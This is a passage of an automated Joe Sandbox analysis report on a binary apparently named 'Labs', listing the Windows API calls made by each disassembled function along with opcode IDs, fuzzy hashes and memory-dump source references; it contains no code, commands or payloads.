                                                    • String ID:
                                                    • API String ID: 3440857362-0
                                                    • Opcode ID: cd96a08848bed3bf8ba58464cb42b6a385b80f14333f07dbeb6c4dbf01b3d6c5
                                                    • Instruction ID: 2b28f44246df45dfb5ab319df07ab67beb04705bf26f21b3e8c4404ba95fbe12
                                                    • Opcode Fuzzy Hash: cd96a08848bed3bf8ba58464cb42b6a385b80f14333f07dbeb6c4dbf01b3d6c5
                                                    • Instruction Fuzzy Hash: CB513A71208208EFD714EF64C885F7AB7E9BF84314F44891DF59587292DB38E905CBA2
                                                    APIs
                                                    • GetPrivateProfileSectionW.KERNEL32(00000003,?,00007FFF,?), ref: 007DEC62
                                                    • GetPrivateProfileSectionW.KERNEL32(?,00000001,00000003,?), ref: 007DEC8B
                                                    • WritePrivateProfileSectionW.KERNEL32(?,?,?), ref: 007DECCA
                                                      • Part of subcall function 00774D37: __itow.LIBCMT ref: 00774D62
                                                      • Part of subcall function 00774D37: __swprintf.LIBCMT ref: 00774DAC
                                                    • WritePrivateProfileStringW.KERNEL32(00000003,00000000,00000000,?), ref: 007DECEF
                                                    • WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 007DECF7
                                                    Memory Dump Source
                                                    • Source File: 00000013.00000002.2255906957.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                    • Associated: 00000013.00000002.2255889922.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2255972069.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2255972069.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2256017009.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2256035027.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_19_2_770000_Labs.jbxd
                                                    Similarity
                                                    • API ID: PrivateProfile$SectionWrite$String$__itow__swprintf
                                                    • String ID:
                                                    • API String ID: 1389676194-0
                                                    • Opcode ID: 1027e638d7200e54cf722f1ecd383baf923834da0f3ed77b9e25ea1868b8311d
                                                    • Instruction ID: 47745a782b6441182ce65b878c65c152450fbc61f4775fed280ea55ae5c77306
                                                    • Opcode Fuzzy Hash: 1027e638d7200e54cf722f1ecd383baf923834da0f3ed77b9e25ea1868b8311d
                                                    • Instruction Fuzzy Hash: 2F512835A00205DFCF11EF64C989AAEBBF5EF09310B148099E949AB361CB35ED51DF60
                                                    Memory Dump Source
                                                    • Source File: 00000013.00000002.2255906957.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                    • Associated: 00000013.00000002.2255889922.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2255972069.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2255972069.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2256017009.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2256035027.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_19_2_770000_Labs.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 6dbadc64f7c2600c78b54888d38595da08cdf20591d5275fbd8414bf095c7f28
                                                    • Instruction ID: 92bca60ad7cb77907a076dcf80ea93111a0ae1c1727fd0e0d5632226ad7d075d
                                                    • Opcode Fuzzy Hash: 6dbadc64f7c2600c78b54888d38595da08cdf20591d5275fbd8414bf095c7f28
                                                    • Instruction Fuzzy Hash: A741D3B590410CBFD720EB28CC48FB9BBB8EB09350F144165EA1AA73D1D778AD41DA61
                                                    APIs
                                                    • GetCursorPos.USER32(?), ref: 00772727
                                                    • ScreenToClient.USER32(008377B0,?), ref: 00772744
                                                    • GetAsyncKeyState.USER32(00000001), ref: 00772769
                                                    • GetAsyncKeyState.USER32(00000002), ref: 00772777
                                                    Memory Dump Source
                                                    • Source File: 00000013.00000002.2255906957.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                    • Associated: 00000013.00000002.2255889922.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2255972069.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2255972069.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2256017009.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2256035027.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_19_2_770000_Labs.jbxd
                                                    Similarity
                                                    • API ID: AsyncState$ClientCursorScreen
                                                    • String ID:
                                                    • API String ID: 4210589936-0
                                                    • Opcode ID: 9ad642f810306af1a9b7957b6229bda6f010c19e53f37ed0c350e2cff4d95433
                                                    • Instruction ID: e8f32d930b2548c437d3cbf8d47a624c97a02f7c31344c760d40d38e42d3fcc7
                                                    • Opcode Fuzzy Hash: 9ad642f810306af1a9b7957b6229bda6f010c19e53f37ed0c350e2cff4d95433
                                                    • Instruction Fuzzy Hash: C3418135504109FFDF1A9F68C948AE9BB74FB46364F20831AF93896291CB38AD50DF91
                                                    APIs
                                                    • GetWindowRect.USER32(?,?), ref: 007C95E8
                                                    • PostMessageW.USER32(?,00000201,00000001), ref: 007C9692
                                                    • Sleep.KERNEL32(00000000,?,00000201,00000001,?,?,?), ref: 007C969A
                                                    • PostMessageW.USER32(?,00000202,00000000), ref: 007C96A8
                                                    • Sleep.KERNEL32(00000000,?,00000202,00000000,?,?,00000201,00000001,?,?,?), ref: 007C96B0
                                                    Memory Dump Source
                                                    • Source File: 00000013.00000002.2255906957.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                    • Associated: 00000013.00000002.2255889922.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2255972069.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2255972069.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2256017009.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2256035027.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_19_2_770000_Labs.jbxd
                                                    Similarity
                                                    • API ID: MessagePostSleep$RectWindow
                                                    • String ID:
                                                    • API String ID: 3382505437-0
                                                    • Opcode ID: fea025ba6f2b6a22f884fa345ede6e60df05b18e596567a11344623443418159
                                                    • Instruction ID: 5892908aa650727d354f0b15a62a7e5e1fb2751d11ade372d6e8100445788e6f
                                                    • Opcode Fuzzy Hash: fea025ba6f2b6a22f884fa345ede6e60df05b18e596567a11344623443418159
                                                    • Instruction Fuzzy Hash: 4231BA71900219EBDB54CFA8D94CF9E7BB9FB44315F10422DFA24AB2D0C3B49924DB90
                                                    APIs
                                                    • IsWindowVisible.USER32(?), ref: 007CBD9D
                                                    • SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 007CBDBA
                                                    • SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 007CBDF2
                                                    • CharUpperBuffW.USER32(00000000,00000000,?,?,?,?), ref: 007CBE18
                                                    • _wcsstr.LIBCMT ref: 007CBE22
                                                    Memory Dump Source
                                                    • Source File: 00000013.00000002.2255906957.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                    • Associated: 00000013.00000002.2255889922.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2255972069.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2255972069.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2256017009.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2256035027.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_19_2_770000_Labs.jbxd
                                                    Similarity
                                                    • API ID: MessageSend$BuffCharUpperVisibleWindow_wcsstr
                                                    • String ID:
                                                    • API String ID: 3902887630-0
                                                    • Opcode ID: 51e95246f00c34747cfca716a72429d0b58871d329769db7ec8c5db944b22c72
                                                    • Instruction ID: aed3d8d6d57398547e1ec40573df269556324ece9e875a66f449a342b4347f9e
                                                    • Opcode Fuzzy Hash: 51e95246f00c34747cfca716a72429d0b58871d329769db7ec8c5db944b22c72
                                                    • Instruction Fuzzy Hash: 2921F972204204BBEB255B79AC4AFBB7B9DDF45B60F10402DF909CA191EF69DC5096A0
                                                    APIs
                                                      • Part of subcall function 007729E2: GetWindowLongW.USER32(?,000000EB), ref: 007729F3
                                                    • GetWindowLongW.USER32(?,000000F0), ref: 007FB804
                                                    • SetWindowLongW.USER32(00000000,000000F0,00000001), ref: 007FB829
                                                    • SetWindowLongW.USER32(00000000,000000EC,000000FF), ref: 007FB841
                                                    • GetSystemMetrics.USER32(00000004), ref: 007FB86A
                                                    • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000047,?,?,?,?,?,?,?,007E155C,00000000), ref: 007FB888
                                                    Memory Dump Source
                                                    • Source File: 00000013.00000002.2255906957.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                    • Associated: 00000013.00000002.2255889922.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2255972069.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2255972069.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2256017009.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2256035027.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_19_2_770000_Labs.jbxd
                                                    Similarity
                                                    • API ID: Window$Long$MetricsSystem
                                                    • String ID:
                                                    • API String ID: 2294984445-0
                                                    • Opcode ID: 11f751f926baba71cfc9827e319ada53f22db4f2f4fdfbf733db8101297da548
                                                    • Instruction ID: 9b86ee0cecf869ae599425cc22f00192ac2024e6f30c1b3decba143642f41b4a
                                                    • Opcode Fuzzy Hash: 11f751f926baba71cfc9827e319ada53f22db4f2f4fdfbf733db8101297da548
                                                    • Instruction Fuzzy Hash: CF216D71914259AFCB249F39CC08B7A3BA8FB85765F244A39FA25D62E0D7349850CAD0
                                                    APIs
                                                    • IsWindow.USER32(00000000), ref: 007E6159
                                                    • GetForegroundWindow.USER32 ref: 007E6170
                                                    • GetDC.USER32(00000000), ref: 007E61AC
                                                    • GetPixel.GDI32(00000000,?,00000003), ref: 007E61B8
                                                    • ReleaseDC.USER32(00000000,00000003), ref: 007E61F3
                                                    Memory Dump Source
                                                    • Source File: 00000013.00000002.2255906957.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                    • Associated: 00000013.00000002.2255889922.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2255972069.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2255972069.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2256017009.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2256035027.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_19_2_770000_Labs.jbxd
                                                    Similarity
                                                    • API ID: Window$ForegroundPixelRelease
                                                    • String ID:
                                                    • API String ID: 4156661090-0
                                                    • Opcode ID: 06c70c26dabe0965ed42b5271a7db5c5b2f30756c857b1d6715c0c68b7fded63
                                                    • Instruction ID: 15e9e7b1a5a9c069b15e0281eefd54dcd1515c12b11034e825e7ae33b7cbc6c8
                                                    • Opcode Fuzzy Hash: 06c70c26dabe0965ed42b5271a7db5c5b2f30756c857b1d6715c0c68b7fded63
                                                    • Instruction Fuzzy Hash: 3F21A175A01604EFD750EF65DC88A9ABBF9FF98350F04C469E94A97352CB75AC00CB90
                                                    APIs
                                                    • ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00771729
                                                    • SelectObject.GDI32(?,00000000), ref: 00771738
                                                    • BeginPath.GDI32(?), ref: 0077174F
                                                    • SelectObject.GDI32(?,00000000), ref: 00771778
                                                    Memory Dump Source
                                                    • Source File: 00000013.00000002.2255906957.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                    • Associated: 00000013.00000002.2255889922.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2255972069.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2255972069.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2256017009.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2256035027.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_19_2_770000_Labs.jbxd
                                                    Similarity
                                                    • API ID: ObjectSelect$BeginCreatePath
                                                    • String ID:
                                                    • API String ID: 3225163088-0
                                                    • Opcode ID: 24fe5b5bc044cdd3044ce212e21f3a395a280e080c87256f43f3c79e451a3f67
                                                    • Instruction ID: 9429f1ab8a6347212ab68bf481b2696333898261f81490ac39232036a3ea0a27
                                                    • Opcode Fuzzy Hash: 24fe5b5bc044cdd3044ce212e21f3a395a280e080c87256f43f3c79e451a3f67
                                                    • Instruction Fuzzy Hash: F821C5B0904208EFDF209F28DC48B697BF8F780351F548626F929A61A0D779D991CF94
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000013.00000002.2255906957.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                    • Associated: 00000013.00000002.2255889922.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2255972069.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2255972069.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2256017009.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2256035027.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_19_2_770000_Labs.jbxd
                                                    Similarity
                                                    • API ID: _memcmp
                                                    • String ID:
                                                    • API String ID: 2931989736-0
                                                    • Opcode ID: b0fd1145f580979a4e17b44b8bd0f0e5f395ffae62c85c97fee3d2af7ecebcfb
                                                    • Instruction ID: adf7c88f33eeb03e156fc8002fc089dcfa2d5a6954861951d825b8a567731332
                                                    • Opcode Fuzzy Hash: b0fd1145f580979a4e17b44b8bd0f0e5f395ffae62c85c97fee3d2af7ecebcfb
                                                    • Instruction Fuzzy Hash: F501F963A442057BE612A1105C46FB7739CEF20354F04402DFE1AD6341FB5CDE1082E0
                                                    APIs
                                                    • GetCurrentThreadId.KERNEL32 ref: 007D5075
                                                    • __beginthreadex.LIBCMT ref: 007D5093
                                                    • MessageBoxW.USER32(?,?,?,?), ref: 007D50A8
                                                    • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?), ref: 007D50BE
                                                    • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 007D50C5
                                                    Memory Dump Source
                                                    • Source File: 00000013.00000002.2255906957.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                    • Associated: 00000013.00000002.2255889922.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2255972069.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2255972069.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2256017009.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2256035027.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_19_2_770000_Labs.jbxd
                                                    Similarity
                                                    • API ID: CloseCurrentHandleMessageObjectSingleThreadWait__beginthreadex
                                                    • String ID:
                                                    • API String ID: 3824534824-0
                                                    • Opcode ID: 27928953800677d86a74f307dcbc1162d14cfbadce48f1526ff2be7072fb5580
                                                    • Instruction ID: 4038795740d86ca5367c1dc341a0d9e8b8af105537c26de3ea5256e0d8e3ebe4
                                                    • Opcode Fuzzy Hash: 27928953800677d86a74f307dcbc1162d14cfbadce48f1526ff2be7072fb5580
                                                    • Instruction Fuzzy Hash: FD1104B2908708BBCB518BA89C08B9B7BBDBB85321F14425AF915D3360D675C9448BF0
                                                    APIs
                                                    • GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 007C8E3C
                                                    • GetLastError.KERNEL32(?,007C8900,?,?,?), ref: 007C8E46
                                                    • GetProcessHeap.KERNEL32(00000008,?,?,007C8900,?,?,?), ref: 007C8E55
                                                    • HeapAlloc.KERNEL32(00000000,?,007C8900,?,?,?), ref: 007C8E5C
                                                    • GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 007C8E73
                                                    Memory Dump Source
                                                    • Source File: 00000013.00000002.2255906957.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                    • Associated: 00000013.00000002.2255889922.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2255972069.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2255972069.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2256017009.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2256035027.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_19_2_770000_Labs.jbxd
                                                    Similarity
                                                    • API ID: HeapObjectSecurityUser$AllocErrorLastProcess
                                                    • String ID:
                                                    • API String ID: 842720411-0
                                                    • Opcode ID: 5dbcaca1b63df50331fd012200aa5d7de4ce570dd8f27d741b549e7060f8b151
                                                    • Instruction ID: 3fa3ec54635d6803eb55aecf6349b687d29442bd547154c4659db53040a18309
                                                    • Opcode Fuzzy Hash: 5dbcaca1b63df50331fd012200aa5d7de4ce570dd8f27d741b549e7060f8b151
                                                    • Instruction Fuzzy Hash: C0011D71601244BFDB614FA9DC49E6B7BADFF89755B10056DF849C2220DB329C50CF61
                                                    APIs
                                                    • CLSIDFromProgID.OLE32(?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,007C7C62,80070057,?,?,?,007C8073), ref: 007C7D45
                                                    • ProgIDFromCLSID.OLE32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,007C7C62,80070057,?,?), ref: 007C7D60
                                                    • lstrcmpiW.KERNEL32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,007C7C62,80070057,?,?), ref: 007C7D6E
                                                    • CoTaskMemFree.OLE32(00000000,?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,007C7C62,80070057,?), ref: 007C7D7E
                                                    • CLSIDFromString.OLE32(?,?,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,007C7C62,80070057,?,?), ref: 007C7D8A
                                                    Memory Dump Source
                                                    • Source File: 00000013.00000002.2255906957.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                    • Associated: 00000013.00000002.2255889922.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2255972069.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2255972069.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2256017009.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2256035027.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_19_2_770000_Labs.jbxd
                                                    Similarity
                                                    • API ID: From$Prog$FreeStringTasklstrcmpi
                                                    • String ID:
                                                    • API String ID: 3897988419-0
                                                    • Opcode ID: 3ac7f0c408a6fce64aecc8fcbe11776a19c1d7a297f1b2e6cb5af079958793e9
                                                    • Instruction ID: 4fc71f7bac8cb70dae5c5cc559fd609c619c44fba71dda21b4a1070c308471d1
                                                    • Opcode Fuzzy Hash: 3ac7f0c408a6fce64aecc8fcbe11776a19c1d7a297f1b2e6cb5af079958793e9
                                                    • Instruction Fuzzy Hash: 60015A72605214ABDB154F54DC45FAA7BADFF48762F14802CF90AD6210DB75ED00DFA0
                                                    APIs
                                                    • GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 007C8CDE
                                                    • GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 007C8CE8
                                                    • GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 007C8CF7
                                                    • HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 007C8CFE
                                                    • GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 007C8D14
                                                    Memory Dump Source
                                                    • Source File: 00000013.00000002.2255906957.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                    • Associated: 00000013.00000002.2255889922.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2255972069.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2255972069.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2256017009.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2256035027.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_19_2_770000_Labs.jbxd
                                                    Similarity
                                                    • API ID: HeapInformationToken$AllocErrorLastProcess
                                                    • String ID:
                                                    • API String ID: 44706859-0
                                                    • Opcode ID: 071f4301c58d72d21201029cea6d6c99a1789dc8b1ae44567dffa6f6e5002826
                                                    • Instruction ID: 6532bdede67c62d693c176e1e53b8dd2d7dd27fbc42c7c0b0e4abc63b703f22f
                                                    • Opcode Fuzzy Hash: 071f4301c58d72d21201029cea6d6c99a1789dc8b1ae44567dffa6f6e5002826
                                                    • Instruction Fuzzy Hash: 8EF04935300208AFEB914FA59C89F6B3BADFF8D754F10452DF94AC61A0CA65AC41DF61
                                                    APIs
                                                    • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 007C8D3F
                                                    • GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 007C8D49
                                                    • GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 007C8D58
                                                    • HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 007C8D5F
                                                    • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 007C8D75
                                                    Memory Dump Source
                                                    • Source File: 00000013.00000002.2255906957.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                    • Associated: 00000013.00000002.2255889922.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2255972069.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2255972069.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2256017009.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2256035027.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_19_2_770000_Labs.jbxd
                                                    Similarity
                                                    • API ID: HeapInformationToken$AllocErrorLastProcess
                                                    • String ID:
                                                    • API String ID: 44706859-0
                                                    • Opcode ID: 43adfbae9e1133ae13d0c872030845e9c3fd9b56210474d34ad0f81f7a021924
                                                    • Instruction ID: 0e53c726f66a3b55721a6bdeba4c233d2b9b11aa5118b20ffabc8e846be7ac23
                                                    • Opcode Fuzzy Hash: 43adfbae9e1133ae13d0c872030845e9c3fd9b56210474d34ad0f81f7a021924
                                                    • Instruction Fuzzy Hash: 9DF03731240204AFEBA14FA5EC88F6B3BADFF89754F14412DF94A861A0CB659D41DBA1
                                                    APIs
                                                    • GetDlgItem.USER32(?,000003E9), ref: 007CCD90
                                                    • GetWindowTextW.USER32(00000000,?,00000100), ref: 007CCDA7
                                                    • MessageBeep.USER32(00000000), ref: 007CCDBF
                                                    • KillTimer.USER32(?,0000040A), ref: 007CCDDB
                                                    • EndDialog.USER32(?,00000001), ref: 007CCDF5
                                                    Memory Dump Source
                                                    • Source File: 00000013.00000002.2255906957.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                    • Associated: 00000013.00000002.2255889922.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2255972069.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2255972069.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2256017009.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2256035027.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_19_2_770000_Labs.jbxd
                                                    Similarity
                                                    • API ID: BeepDialogItemKillMessageTextTimerWindow
                                                    • String ID:
                                                    • API String ID: 3741023627-0
                                                    • Opcode ID: 12c3ae2899926fbe03af411c19cf7728ebbe9e55bf1ec92052cfe14be87f903d
                                                    • Instruction ID: a05e4e95e7c57ca362a062e3ddd6786c84ee5bf8f9ef40217806686e16b2104a
                                                    • Opcode Fuzzy Hash: 12c3ae2899926fbe03af411c19cf7728ebbe9e55bf1ec92052cfe14be87f903d
                                                    • Instruction Fuzzy Hash: 9B018630640704ABEB225B60DD4EFA67B7DFB10705F04066DF597A10E1DBF9A9548F80
                                                    APIs
                                                    • EndPath.GDI32(?), ref: 0077179B
                                                    • StrokeAndFillPath.GDI32(?,?,007ABBC9,00000000,?), ref: 007717B7
                                                    • SelectObject.GDI32(?,00000000), ref: 007717CA
                                                    • DeleteObject.GDI32 ref: 007717DD
                                                    • StrokePath.GDI32(?), ref: 007717F8
                                                    Memory Dump Source
                                                    • Source File: 00000013.00000002.2255906957.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                    • Associated: 00000013.00000002.2255889922.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2255972069.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2255972069.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2256017009.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2256035027.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_19_2_770000_Labs.jbxd
                                                    Similarity
                                                    • API ID: Path$ObjectStroke$DeleteFillSelect
                                                    • String ID:
                                                    • API String ID: 2625713937-0
                                                    • Opcode ID: f6be4bcab285afa606526621273256a2d345f900e8774b4b3d14cb1b91de0d52
                                                    • Instruction ID: 2885e656f30fd807a067adcbb8730a2b54010d0fa3f38d63b8aca4048517ec70
                                                    • Opcode Fuzzy Hash: f6be4bcab285afa606526621273256a2d345f900e8774b4b3d14cb1b91de0d52
                                                    • Instruction Fuzzy Hash: E6F03770008608EBDB659F2AEC4CB583FA4BB41362F44C624F92D441F0CB38CA96DF94
                                                    APIs
                                                    • CoInitialize.OLE32(00000000), ref: 007DCA75
                                                    • CoCreateInstance.OLE32(00803D3C,00000000,00000001,00803BAC,?), ref: 007DCA8D
